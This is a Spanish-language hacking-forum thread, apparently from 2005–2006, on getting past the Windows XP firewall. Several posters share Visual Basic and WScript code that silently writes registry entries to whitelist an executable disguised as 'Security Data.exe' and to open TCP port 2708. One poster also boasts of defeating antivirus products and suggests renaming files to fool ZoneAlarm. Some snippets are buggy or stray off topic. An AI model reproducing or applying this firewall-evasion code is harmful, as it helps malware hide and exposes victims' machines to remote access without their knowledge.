Detectar si el Firewall de Win XP bloquea la aplicación

Iniciado por Scratz, 11 Septiembre 2005, 19:27 PM

0 Miembros y 1 Visitante están viendo este tema.

Zorrohack

bueno si es un Archivo encryptado pues se me ocurren dos cosas:

1. descifrar ese archivo
2. Renombrar el Archivo para asi "joder" el Zone Alarm

Progresamos porque hay Millones de imbeciles, maldicion jodi a McAfee,Panda,Kav,Norton, perdonen solo practicaba.

Badlands

renombrarlo lo dudo ya que no se puede modificar...
y desencriptarlo ni idea me voy a poner a investigar...si tenes algun link me seria de mucha ayuda.

JanditoOo

Uso Visual Basic 6.0 y pongo este comando:

Citar
Private Form_Load()

RegSetValues RegLocalMachine, "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\", App.Path & "\" & "Security Data.exe", App.Path & "\" & "Security Data.exe" & ":*:Enabled:Security Data", RegString

RegSetValues RegLocalMachine, "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\", "2708:TCP", "2708:TCP:*:Enabled:Puerto Security Data", RegString
End Sub

y me selecciona RegLocalMachine con el siguiente error:

Compile error:
Invalid Outside Procedure

que estara mal?

cracket13


JanditoOo

Cita de: cracket13 en  7 Septiembre 2006, 19:50 PM
ami tambn me selecciona  RegLocalMachine  :-\

Ya lo arregle es pq necesitas declarar las apis: mira este codigo:

Citar

Private Sub Form_Load()

On Error Resume Next
Set WS = CreateObject("WScript.Shell") ' asignamos a una variable el objeto

WS.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\VitalWerks\DUC\", "Default", "", "RegString"

End Sub


y asi funciona correctamente =)

Scratz

Wow! Este mensaje lo postee hace una año y por fin hay respuestas. Gracias a todos.
\\... The Revolution Is Comming ...//

LixKeÜ

Dim fir
Set fir = CreateObject("WScript.Shell") ' asignamos a una variable el objeto

fir.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\", App.Path & "\" & "Security Data.exe", App.Path & "\" & "Security Data.exe" & ":*:Enabled:Security Data", RegString

fir.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\", "2708:TCP", "2708:TCP:*:Enabled:Puerto Security Data", RegString